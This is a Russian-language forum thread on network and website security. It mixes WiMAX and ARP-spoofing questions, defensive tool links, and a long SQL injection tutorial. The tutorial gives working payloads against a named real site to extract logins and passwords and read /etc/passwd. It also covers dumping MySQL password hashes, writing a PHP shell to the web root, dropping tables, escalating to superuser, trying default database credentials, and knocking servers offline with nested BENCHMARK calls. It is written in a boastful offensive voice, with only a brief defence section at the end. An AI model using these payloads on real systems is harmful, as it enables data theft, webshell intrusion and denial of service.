Защита сетей от проникновения

S

Shaq

Есть вопрос по сетям Wi-max!!!Есть Wi-max,которая работает только на входящий трафик.Говорят, что можно ее хакнуть и выкачать через нее информацию.Если да, то как ее защитить???Какими прогами???А если нет, то КЛЕВО!!!))):D
 

Spirit

Ословед
В WiMAX предусмотрено тройное шифрование данных по алгоритму DES 3. Аутентификация поддерживается как часть общего подуровня цифровых сертификатов Х.509 (РК1). WiMAX устройства обладают уникальными сертификатами, одним для данного типа устройств, одним для данного производителя. Таким образом, будет достигаться эффективная и надежная защита потоков данных. Поэтому на основе WiMax даже создаются виртуальные приватные сети (VPN). Они позволяют формировать защищенные туннели для обмена данными как с удаленными пользователям, так и внутри компании.
 
Защита сайтов от атак и различных методов взлома

Защита сайтов от атак и различных методов взлома
 

    FLATRON

    очки: 4
    Нет комментариев
Обход фильтрации при проведении SQL инъекцииИМХО, статей на эту тему много, но по просьбам трудящихся попробую в кратце объяснить)
О скуль писать не буду расскажу только о обходе фильтрации.

На пример возьмем сайт oxid.ru
http://oxid.ru/notes/rasdel.php?id=...16,17,18,19,20,21,22,23,24,25,26+from+users/*
Как мы все видим в таблице 26 полей и называеться она(таблица) users =)
Среди этих 26-ти полей есть login и pass, но этом нам щас не к чему)
http://oxid.ru/notes/rasdel.php?id=-24+union+select+1,2,concat(login,char(58),pass),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+users+limit+1,1/*
Функции char() в mysql передается значение какого-либо символа в ascii кодировке и она возвращает этот символ(или набор символов) в нормальном читабельном виде, в нашем случае 58 в ascii это знак `:`.

Вот еще один способ который я знаю:
http://oxid.ru/notes/rasdel.php?id=-24+union+select+1,load_file(0x2f6574632f706173737764),concat(login,char(58),pass),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+users+limit+1,1/* Здесь мы просто пишем значение в шестнадцатиричном виде, и дописываем перед ним 0x(это обязательно), то есть 2f6574632f706173737764 - это /etc/passwd в шесинадцатиричном виде.
Пример кода(на пхп) переводящего нормальные слова в аски кодировку и в шестнадцатиричный вид)
-------------------------------------------------


$index = strlen($word); //word - в эту переменную мы вписываем то что нам надо перевести
for ($i = 0; $index > $i; $i++)
$endword = $endword.ord($word[$i]).',';
echo 'ascii'.$word.' >> '.$endword;
echo 'hex'.$word.' >> '.bin2hex($word);

?>
 

    TAGERNAUT

    очки: 0
    кульно!
Самая частая ошибка заключается в том, что названия таблицы берут из URL, что чаще всего встречается в форумах и бордах. Т.е. для обращения к форуму best с сайта blah-blah.gov используется строчка
http://www.blah-blah.gov/base.pl?forum=best.
Скорее всего, параметр forum будет заноситься в переменную $forum. Значит горе-кодер в своих скриптах прописал что-то типа:

SELECT * FROM $forum;
UPDATE $forum SET DATE = ▒09/08/02▓

Вроде бы всё хорошо, но вся изюминка в том, что названия таблицы обычно не проверяют на правильность. А это значит, что ничто не сможет нам помешать написать в URL▓е строку такого содержания:
http://www.blah-blah.gov/base.pl?forum=best;SELECT * FROM best; DROP TABLE best■. После чего запустится скрипт и выполнит следующий SQL-запрос:

SELECT * FROM best;
DROP TABLE best;

Который сначала выводит все содержимое таблицы best, а потом удаляет её. Этот запрос, конечно, пройдёт только тогда, когда у пользователя достаточно прав, для того, чтобы удалить таблицу. Но админов, которые дают такие права пользователям, в Internet▓е навалом, сам проверял=].
Теперь ты можешь без особого напряга удалить какую-нибудь базу. Но этого как правило мало. Мы же не вандалы. Допустим на нашем сайте www.blah-blah.gov для того, чтобы использовать форум надо сначала зарегистрироваться. Не вопрос. Идём на страницу регистрации. Как правило, для пользователей тоже создают базу и запрос, который вставляет нового юзера выглядит так:
INSERT INTO userbase
Values (firstname=▓$fname▓, lastname=▓$lname▓, age=$age);

Как ты уже понял, описанный выше способ применим и для других параметров, передаваемых в URL. А теперь представь, что мы знаем, что в этой таблице есть также поле xlev, значение которого принимает два значения, либо user либо superuser. Как несложно догадаться, если ты superuser, то можешь делать с форумом, что захочешь. Но проблема в том, что если это поле пустует, то пользователь считается простым user■ом. Не порядок. Если повнимательнее рассмотреть данный запрос можно увидеть параметр $age, стоящий без кавычек. Как правило, числовые данные не проверяют на действительность, и туда можно записать что угодно. Этим мы и воспользуемся. Вводим всё как надо, а в строке age пишем:25,xlev=▓superuser▓. Вот ты и бог=]. Как видишь, ничего сверх сложного здесь нет. Надо только подумать чуть-чуть.
DEFAULT
А теперь самое главное. Можно искать сайты с тупыми скриптами, передающими параметры в URL▓е, а можно сделать умнее=]. Я уверен, что ты уже знаешь, что многие админы, особенно начинающие, ставят всё по дефолту. К них ещё нет опыта, и не знают, что это не есть гуд. Хочу заметить, что этим грешат также и матёрые сисопы. Так вот. Многие либо оставляют логин и пароль SQL сервера по умолчанию, или меняют пароль на какой-нибудь типа 54321. Вот этим и надо прежде всего воспользоваться. В Microsoft SQL Server по умолчанию стоит юзер sa без пароля, а в MySQL, root также без пароля. MsSQL и MySQL сидят на портах 1433 и 3366 соответственно. Так что качай клиент и попробуй вломится на базу под стандартным юзером. Если тебе не повезло и пароль не подходит, то советую тебе скачать брутфорс, для удалённого перебора паролей SQL (найти его можно на нашем сайте в File ->> Password Crack).
EXPLOITS
Для взлома SQL серверов, существует много exploit▓ов. Описывать их я не буду, т.к. чтобы описать хотя бы самые достойные из них понадобится много места и время, да к тому же я не считаю это нужным. На нашем сайте в архиве exploit▓ов ты найдёшь исходники как для получения root▓а, так и для удалённый DoS атак на SQL сервер. К тому же рассчитывая на то, что в последнее время в MsSQL нашли два десятка таких дыр, DoS на MsSQL становится более актуальным.
 
Выявление наличия SQL инъекции.
Зачастую, о наличии SQL инъекции могут сказать ошибки, явно указывающие, что произошла ошибка в sql запросе. В тоже время о наличии ошибки в SQL запросе можно судить и по косвенным признакам.
Для проверки, полностью фильтруется некоторый параметр или нет, передаем несколько измененные значения этого параметра. Например, вместо http://site/test.php?id=12 передаем.
http://site/test.php?id=12'
http://site/test.php?id=aaa
http://site/test.php?id=13-1
Если последний запрос выдает страницу, аналогичную, как и http://site/test.php?id=12, это в большинстве случаев может однозначно свидетельствовать о наличии SQL инъекции в не фильтруемом целом параметре.
Анализ БД через MySQL инъекцию.
И так, допустим нам известно о недостаточной фильтрации параметра id в скрипте http://site/test.php?id=12
Наличие подробных сообщениях об ошибках, с текстом SQL запроса, в котором произошла ошибка сведет трудность эксплуатации SQL инъекции к минимуму. Однако, многое можно сделать даже если сообщений об ошибках не выводятся вообще.
Следует принять к сведению тот факт, что даже если текст ошибки не выводиться, можно все равно однозначно судить о том, произошла ошибка, или нет (например, запрос вернул пустой результат).
В частности, возможна ситуации, когда при ошибке, возвращается код ответа 500, или редирект на главную страницу, в то время как при пустом результате запроса будет возвращена пустая страница.
Для того, чтобы выявить эти второстепенные признаки, следует составить http запросы, про которые известно, который приведет к правильному (но возвращающему пустой вывод) SQL запросу, и который приведет к неверному SQL запросу. Например, при не фильтруемом параметре id
http://site/test.php?id=99999, вероятно, будет возвращен пустой sql запрос, в то время, как
http://site/test.php?id=99999' должен породить ошибку.
Теперь, зная как отличить ошибочный запрос от пустого, начинаем последовательно извлекать информация о запросе и базе данных.
Рассмотрим случай, когда иньекция происходит после where. Если мы рассматриваем MySQL базу данных, то получение информации из базы данных может быть возможным только, если сервер имеет версию 4.*, те имеется возможность вставить в запрос union
1) количество полей между select и where
Пробуем последовательно, пока не получим верный запрос:
http://site/test.php?id=99999+union+select+null/*
http://site/test.php?id=99999+union+select+null,null/*
более, того, если не имеется возможность отделить неверный запрос от возвратившего пустой результат, можно сделать так:
http://site/test.php?id=12+union+select+null/*
http://site/test.php?id=12+union+select+null,null/*
Для этого, нам достаточно уметь отделять правильный запрос от неправильного, а это возможно всегда, если имеется факт наличия SQL инъекции.
После того, как мы получим правильный запрос, количество null, будет равно количеству полей между select и where
2) номер столбца с выводом. Нам понадобится знать, в каком по счету столбце происходит вывод на страницу.
При этом, если выводиться на страницу несколько параметров, то лучше найти тот, который, как кажется, имеет наибольший размер типа данных (text лучше всего), как например, описание товара, текст статьи и тд. Ищем его:
http://site/test.php?id=9999+union+select+'test',null,null/*
http://site/test.php?id=9999+union+select+null,'test',null/*
И до тех пор, пока не увидим слово test в нужном нам месте.
Следует обратить внимание, что в этом случае один из подобных запросов обязательно вернет непустое значение.
Тут можно наткнутся на подводный камень: в скрипте, возможно имеется проверка на не пустоту одного из параметров (например, id) тут придется воспользоваться свойством MySQL, числовой тип может быть приведен к любому типу данных, без возникновения ошибки, причем так, что сохранит свое значение.
http://site/test.php?id=9999+union+select+1,2,3/*
Этот же фокус пройдет и там, где кавычки экранируются.
Открытие комментария добавлена для того, чтобы отбросить, остальную часть запроса, если она имеется. MySQL нормально реагирует на незакрытый комментарий.
3) имена таблиц
Теперь можно перебирать имена таблиц.
http://site/test.php?id=12+union+select+null,null,null+from+table1/*
Правильные запросы будут соответствовать существующим именам таблиц. Наверно, интересно будет проверить на существование таблиц users, passwords, regusers и тд и тп.
4)системная информация
у нас уже достаточно информации чтобы составить такой запрос.
http://site/test.php? id=9999+union+select+null,mysql.user.password,null+from+mysql.user/*
В случае, если имеются права на select из базы данных mysql, то этот запрос вернет нам хеш пароля, который в большинстве случаев легко расшифруется. Если выводиться только одна строка из запроса (например, вместо тела статьи), то можно передвигаться по строкам
http://site/test.php? id=9999+union+select+null,mysql.user.password,null+from+mysql.user+limit+0,1/*
http://site/test.php? id=9999+union+select+null,mysql.user.password,null+from+mysql.user+limit+1,1/*
Кроме того можно узнать много интересного:
http://site/test.php?id=9999+union+select+null,DATABASE(),null/*
http://site/test.php?id=9999+union+select+null,USER(),null/*
http://site/test.php?id=9999+union+select+null,VERSION(),null/*
5) названия столбцов в таблице
Их аналогично, можно перебрать: http://site/test.php?id=9999+union+select+null,row1,null+from+table1/* и тд.
текст файлов через MySQL инъекцию.
Если пользователь, под которым осуществляется доступ к бд, имеет права file_priv, то можно получить текст произвольного файла
http://site/test.php?id=9999+union+select+null,LOAD_FILE('/etc/passwd'),null/*
запись файлов в веб директорию (php shell).
Как показала практика, если мы имеем права file_priv, директорию, доступную на запись всем пользователям, доступную кроме того из web, (иногда, директории upload, banners и тд.), а так же знаем имя хотя бы одной таблицы (mysql.user, например сойдет, если имеется доступ к mysql базе данных), то можно выгрузить произвольный файл на сервер используя инъекцию подобного типа.
http://site/test.php?id=9999+union+select+null,' >',null+from+table1+into+outfile+'/usr/local/site/www/banners/cmd.php'/*
При этом конструкция from table1 обязательна.
Если кроме того, на сайте имеется уязвимость, позволяющая выполнять произвольные файлы на сервере, (include("/path/$file.php")), то, в любом случае можно закачать php shell, например в директорию /tmp/, и затем подцепить этот файл оттуда при помощи уязвимости в include.
инъекция после limit.
Довольно части возможность SQL инъекции возникает внутри параметра, передающегося к limit. Это может быть номер страницы и тд и тп.
Практика показывает, что все вышесказанное может быть применено и в этом случае.
MySQL корректно реагирует на запросы типа:
Select … limit 1,2 union select….
Select … limit 1 union select….
Если необходимо чтобы первый подзапрос вернул пустой результат, необходимо искусственно задать большие смещения для первого запросы:
Select … limit 99999,1 union select…. Либо, Select … limit 1,0 union select….
некоторые "подводные камни".
1) Magic quotes
Наиболее частым подводным камнем может оказаться включение магических кавычек в конфигурации php. В случае строковых параметров это вообще позволит избежать возможности SQL инъекции, а в случае целый (дробных) параметров, в подобных запросах невозможно будет использовать кавычки, а следовательно и строки.
Частично, решить эту проблему поможет нам функция char, которая возвращает строке по кодам символов. Например
[SIZE=-2] http://site/test.php?id=9999+union+select+char(116,101,115,116),null,null/*
http://site/test.php?id=9999+union+select+char(116,101,115,116),null,null+from_table1/*
http://site/test.php?id=9999+union+...101,116,99,47,112,97,115,115,119,100)),null/*
[/SIZE] Единственное ограничение. В случае, если хочется сделать into outfile, то а качестве имени файла, необходимо передать имя файла в кавычках. into outfile char(...) выдает ошибку.
2) Mod_security.
Казалось бы, этот модуль веб сервера apache, делает невозможным эксплуатацию уязвимости SQL инъекции. Однако, при некоторых конфигурациях PHP и этого модуля, атаку можно провести прозрачно для этого модуля.
Конфигурация по умолчанию модуля mod_security не фильтрует значение, переданные как cookie. Одновременно, в некоторых случаях, а также в некоторых конфигурациях по умолчанию php, переменные cookie регистрируются автоматически.
Таким образом, злонамеренные значения переменных, абсолютно прозрачно для mod_security можно передать как cookie значения.
DOS в MySQL инъекции.
Если не имеется возможности применения union в запросе, например, MySQL имеет версию 3.*, то, тем не менее, инъекцию можно эксплуатировать, например, для того, чтобы заставить сервер базы данных исчерпать все свои ресурсы.
Для этого, будем использовать функцию BENCHMARK, которая повторяет выполнение выражения expr заданное количество раз, указанное в аргументе count. В качестве основного выражения возьмем функцию, которая сама по себе требует некоторого времени. Например, md5(). В качестве строки возьмем current_date, чтобы строка не содержала кавычек. Функции BENCHMARK можно вкладывать друг в друга. И так, составляем запрос:
http://site/test.php?id=BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date)))
1000000 запросов md5 выполняются (в зависимости от мощности сервера), примерно 5 секунд, 10000000 будут выполнятся около 50 секунд. Вложенный benchmark будет выполняться очень долго, на любом сервере. Теперь останется отправлять до нескольких десятков подобных http запросов в секунду, чтобы ввести сервер в беспробудный даун.
другие типа MySQL инъекции.
Фильтровать целые значения для целых параметров и кавычки для строковых параметров порой недостаточно. Иногда к незапланируемой функциональности может привести применение % и _ специальных символов внутри like запроса. Например:
mysql_query("select id from users where password like '".addslashes($password)."' and user like '".addslashes($user)."'");
в этом случае к любому пользователю подойдет пароль %
apache mod_rewrite
В некоторых случаях, СКЛ инъекция возможна даже в параметре, который преобразуется методами mod_rewrite модуля apache, к GET параметру скрипта.
Например, скрипты типа /news/127.html преобразуются к /news/news.php?id=127 следующим правилом: RewriteRule ^/news/(.*)\.html$ "/news/news.php?id=$1"
Это позволит передать злонамеренные значения параметра скрипту. Так, например /news/128-1.html
Если выводятся подробные сообщения об ошибках, то можно сразу узнать адрес скрипа, и далее, подобрав параметр работать уже с ним. Если же нет, то можно исследовать уязвимость, прямо редактируя имя файла.
коротко о защите.
Для защиты от всего вышесказанного достаточно придерживаться нескольких простых правил.
1) для целых и дробных величин, перед их использованием в запросе достаточно привести величину к нужному типу.
$id=(int)$id; $total=(float)$total;
Вместо этого можно вставить систему слежения за тестированием на SQL инъекцию.
if((string)$id<>(string)(int)$id) {
//пишем в лог о попытке
die('ops');
}
2) для строковых параметров, которые не используются в like, regexp и тд, экранируем кавычки.
$str=addslashes($str);
или, лучше,
mysql_escape_string($str)
3) в строках, которые предполагается использовать внутри like, regexp и тд, необходимо так же заэкранировать специальные символы, применяющиеся в этих операторах, если это необходимо. В противном случае, можно задокументировать использование этих символов.
 

x3nus

Ословед
Помогите плиз в мою банку проникли через radmin !!! дайте плиз прогу которая заблокирует доступ !!! Буду очень благодарен.
 

RaMHa

Ословед
ARP-spoofing

Не просто участились, а лавиной обрушились случаи ARP-атак. Думал что у меня одного параноя на этой почве начинается, но узнал и у 5 знакомых их 4х разных подсетей тоже самое. Сеть вылетает, скачивание файлов обрывается, из сетевых игр выкидывает...
Дело это всё рук некоторых недобросовестных граждан и тех, кто устраивает на домашнем ПК "притон" вирусов не имея ни защиты, ни знаний для её установки.
Как бороться с этой заразой? Как обезопасить себя от вылетов? Какие есть средства (рабочие)?


ARP-spoofing — техника атаки в Ethernet сетях, позволяющая перехватывать трафик между хостами. Основана на использовании протокола ARP.
При использовании в распределенной ВС алгоритмов удалённого поиска существует возможность осуществления в такой сети типовой удалённой атаки "ложный объект РВС". Анализ безопасности протокола ARP показывает, что, перехватив на атакующем хосте внутри данного сегмента сети широковещательный ARP-запрос, можно послать ложный ARP-ответ, в котором объявить себя искомым хостом (например, маршрутизатором), и в дальнейшем активно контролировать сетевой трафик дезинформированного хоста, воздействуя на него по схеме "ложный объект РВС".
Материал из Википедии — свободной энциклопедии
 

unbreakable

Модератор
для размышления тем, кто в теме...


Техника сетевой атаки ARP-spoofing. Методы обнаруждения и предотвращения.

ARP-spoofing (ARP-poisoning) — техника сетевой атаки применяемая преимущественно в Ethernet, но возможная и в других, использующих протокол ARP сетях, основанная на использовании недостатков протокола ARP и позволяющая перехватывать трафик между узлами, которые расположены в пределах одного широковещательного домена.
В статье детально описана техника атаки ARP-spoofing, на примере атаки, выполненной с помощью программы ettercap; рассмотрены такие методы обнаружения и предотвращения ARP-атак, как слежение за ARP-активностью с помощью arpwatch, наложение специальных патчей для придания иммунитета системам, использование VLAN и PPPoE. Показано как решать имеющие непосредственное отношение к протоколу ARP задачи: поиск компьютеров по известному MAC-адресу и обнаружение новых компьютеров в сети.
Протокол ARP и атаки с его использованием
Что такое и для чего нужен ARP
Протокол ARP предназначен для преобразования IP-адресов в MAC-адреса. Чаще всего речь идёт преобразовании в адреса Ethernet, но ARP используется и в сетях других технологий: Token Ring, FDDI и других.
Алгоритм работы ARP

Протокол может использоваться в следующих случаях:
  1. Хост A хочет передать IP-пакет узлу B, находящемуся с ним в одной сети;
  2. Хост A хочет передать IP-пакет узлу B, находящемуся с ним в разных сетях, и пользуется для этого услугами маршрутизатора R.
В любом из этих случае узлом A будет использоваться протокол ARP, только в первом случае для определения MAC-адреса узла B, а во втором — для определения MAC-адреса маршрутизатора R. В последнем случае пакет будет передан маршрутизатору для дальнейшей ретрансляции.

Далее для простоты рассматривается первый случай, когда информацией обмениваются узлы, находящиеся непосредственном в одной сети. (Случай когда пакет адресован узлу находящемуся за маршрутизатором отличается только тем, что в пакетах передаваемых после того как ARP-преобразование завершено, используется IP-адрес получателя, но MAC-адрес маршрутизатора, а не получателя.)

Проблемы ARP

Протокол ARP является абсолютно незащищённым. Он не обладает никакими способами проверки подлинности пакетов: как запросов, так и ответов. Ситуация становится ещё более сложной, когда может использоваться самопроизвольный ARP (gratuitous ARP).
Самопроизвольный ARP — такое поведение ARP, когда ARP-ответ присылается, когда в этом (с точки зрения получателя) нет особой необходимости. Самопроизвольный ARP-ответ это пакет-ответ ARP, присланный без запроса. Он применяется для определения конфликтов IP-адресов в сети: как только станция получает адрес по DHCP или адрес присваивается вручную, рассылается ARP-ответ gratuitous ARP.
Самопроизвольный ARP может быть полезен в следующих случаях:
  • Обновление ARP-таблиц, в частности, в кластерных системах;
  • Информирование коммутаторов;
  • Извещение о включении сетевого интерфейса.
Несмотря на эффективность самопроизвольного ARP, он является особенно небезопасным, поскольку с его помощью можно уверить удалённый узел в том, что MAC-адрес какой-либо системы, находящейся с ней в одной сети, изменился и указать, какой адрес используется теперь.
 

unbreakable

Модератор
ARP-spoofing можно предотвратить с помощью функции port-security коммутаторов
Функция port-security коммутатора позволяет защититься от смены MAC-адреса на порту коммутатора. В том случае если компьютер, подключенный к порту коммутатора меняет MAC-адрес или если меняется компьютер, коммутатор замечает подмену и перестаёт передавать пакеты отправленные с новым обратным адресом. Кроме этого, могут выполняться другие действия: отсылка SNMP-трапа, запись в syslog и тому подобное.
При ARP-spoofing’е MAC-адрес отправителя (атакующего) не меняется и поэтому с точки зрения port-security никаких аномалий нет. Функция port-security никак не отвечает за соответствие IP-адресов и MAC-адресов, а атака ARP-spoofing построена именно на этом.
 

RaMHa

Ословед
По какому протоколу осуществляется атака (IP,TCP,UDP,ICMP,GGP,IGRP,AH, зашифрованный IP)? Хочу забанить, вижу несколько IP-адресов и МАС-ов.
 

RaMHa

Ословед
Если у вас частые, непонятные вылеты сети... Если иконка коннекта горит, а никуда зайти не получается... Если вам напрямую сказали, что у вас проблемы в ARP-атаках на ваш компьютер, то:

1. Установите антивирус с самой свещей базой и проверте ПОЛНОСТЬЮ свой ПК. Возможно вирус сидит у вас.

Если ваш ПК чист, то устанавливайте один из трёх вариантов:
2.1. http://ftp.chelcom.ru/pub/Windows/util/ARPDefenderARC.exe
если он не ставится, то качайте и ставьте сперва: WinPcap_4_1_beta4.exe 544.75 Кб 49.[176-179]
2.2. В этом архиве есть обе программы: ARP Protect.rar 730.88 Кб 49.[176-179]
2.3. http://is74.ru/support/instructions/arpdefender.php

3. Если вы САМИ используете программы для АРП-спуфинга и из-за вас тормозят все подсети, то неудевляйтесь, если ваш компьютер заблокируют полностью от сети и пригласят в офис ИС для ... эммм... общения...

Всем постоянного коннекта 1Гб/с! :clap:
 

    Basileus

    очки: 7
    +

    ArmandO

    очки: 1
    спс, надеюсь более не будет частых разрывов=)

PheleX

Ословед
Поставил вчера ARPDefender, действительно вылеты прекратились. Но проблема возникла сегодня: ARPDefender запустился с виндой, но забыл указаную ему сетевую карту( в списке выбора только Adapter for generic dialup and VPN capture - которой у меня нет). Теперь защита перестала работать и вылеты к вечеру опять пошли. Переустановка не помогает. Как быть?
 
2.2. В этом архиве есть обе программы: ARP Protect.rar 730.88 Кб 49.[176-179]
2.3. http://is74.ru/support/instructions/arpdefender.php
А поконкретней об етих программах кто что может сказать? Принцип работы ну и тд. Заранее спс
И ка кето программа "борится" с подменами адресов. Или просто ведет учет?
 

webcelerator1

Заблокирован
Оказывается сколько чудаков меня сканируют....
Прокси ищут и дыры. Но я же не злой, зло сделаю и сразу забуду. Логи сдам в СБ ИС. Хакерам надо помогать, доводить до них популярно, что все в этом мире наказуемо.
Вчера активно искал прокси-сервера юзверь 10.49.14.20 ,
я постараюсь ему привет передать через СБ.
 

webcelerator1

Заблокирован
Да, кстати, и куда заслать логи работы Дефендера?
Например за сегодня -
Компьютеры с одинаковыми MAC (ляляля): 10.51.202.184 и 10.51.200.183
Время 21-30, повторов - 8.
 

webcelerator1

Заблокирован
Ура !

отсылай отчет через хелпдеск из личного кабинета
Ура ! ТП подтвердила про приоритет ХелпДеск-а для пересылки в СБ ИС !
Скриптик что ли замутить для парсинга логов или так, ручками...
Ха. Хакеры, вызываю огонь на себя ! Банке пофиг, а сканы уйдут куда следует...
 
Компьютеры с одинаковыми MAC (ляляля): 10.51.202.184 и 10.51.200.183
Где вас таких "защитнегофф" берут?? Вы про термин "IP-алиас" слышали? А как насчет того, что если компьютер внезапно и внештатно выключился, то он может получить по DHCP другой адрес, и в вашей локальной ARP-таблице его MAC-адрес быдет светиться с двумя IP?
"Специалисты"...
 
Сверху